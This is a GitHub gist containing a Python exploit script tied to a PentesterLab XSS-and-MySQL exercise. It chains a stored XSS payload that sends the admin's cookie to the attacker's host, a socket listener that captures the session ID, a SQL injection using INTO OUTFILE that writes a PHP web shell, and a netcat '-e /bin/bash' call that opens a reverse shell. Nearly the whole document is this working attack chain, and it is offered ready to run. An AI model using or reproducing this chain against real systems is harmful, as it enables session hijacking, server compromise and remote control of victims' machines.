Skip to content

Instantly share code, notes, and snippets.

@cyberheartmi9
Created September 3, 2023 20:47
Show Gist options
  • Save cyberheartmi9/c0981f221a538117ef97aab634332b01 to your computer and use it in GitHub Desktop.
Save cyberheartmi9/c0981f221a538117ef97aab634332b01 to your computer and use it in GitHub Desktop.
import requests
import socket
import sys
import random
import string
banner="""
██ ██ ███████ ███████ ████████ ██████ ██████ ██████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███ ███████ ███████ ██ ██ ██ ██████ ██ █████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ███████ ██ ██████ ██ ██ ██████ ███████
@intx0x80
https://pentesterlab.com/exercises/xss_and_mysql_file/course
"""
host="0.0.0.0"
port=80
adminsess=requests.Session()
proxies={"http":"127.0.0.1:8080"}
def send_comments(ip,lhost):
#
data={"title":"PW","author":"guest","text":f"<script>document.write('<img src=http://{lhost}/'+document.cookie+' />');</script>","submit":"Submit"}
req=requests.post(f"http://{ip}//post_comment.php?id=1",data=data,allow_redirects=False)
if req.status_code==302:
return True
def server(host,lport):
#
so = socket.socket()
so.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
so.bind((host,lport))
so.listen()
print("[*] Server Running...")
(handler, conn) = so.accept()
data = handler.recv(4096)
cookies=data.split(b"HTTP")[0][5:].decode("UTF-8")
return cookies.split("=")[1]
def SQLinj(ip,admincookie,filename):
#
adminsess.cookies.set("PHPSESSID",str(admincookie))
url=f"http://{ip}/admin/edit.php?id=-1%20union%20select%201,%27%3C?php%20system($_GET[\\%27cmd\\%27]);%20?%3E%27,3,4%20into%20outfile%20%27/var/www/images/{filename}.php%27"
req=adminsess.get(url)
req2=requests.get(f"http://{ip}//images/{filename}.php")
if req2.status_code==200:
return True
def reverse_shelll(ip,filename,lhost,lport):
#
url=f"http://{ip}/images/{filename}.php?cmd=nc+{lhost}+{lport}+-e+/bin/bash"
requests.get(url)
def main():
if len(sys.argv) != 4:
print(banner)
print ("(+) usage: %s <target> <LHOST> <LPORT> " % sys.argv[0])
print ('(+) eg: %s 172.17.0.2 172.17.0.2 443' % sys.argv[0])
sys.exit(-1)
print(banner)
ip=sys.argv[1]
lhost=sys.argv[2]
filename=''.join(random.choice(string.ascii_letters) for _ in range(5))
lport=int(sys.argv[3])
if send_comments(ip,lhost):
cookie=server(host,port)
if SQLinj(ip,cookie,filename):
print("[+] Check your Listener :) ")
reverse_shelll(ip,filename,lhost,lport)
#print(cookie)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment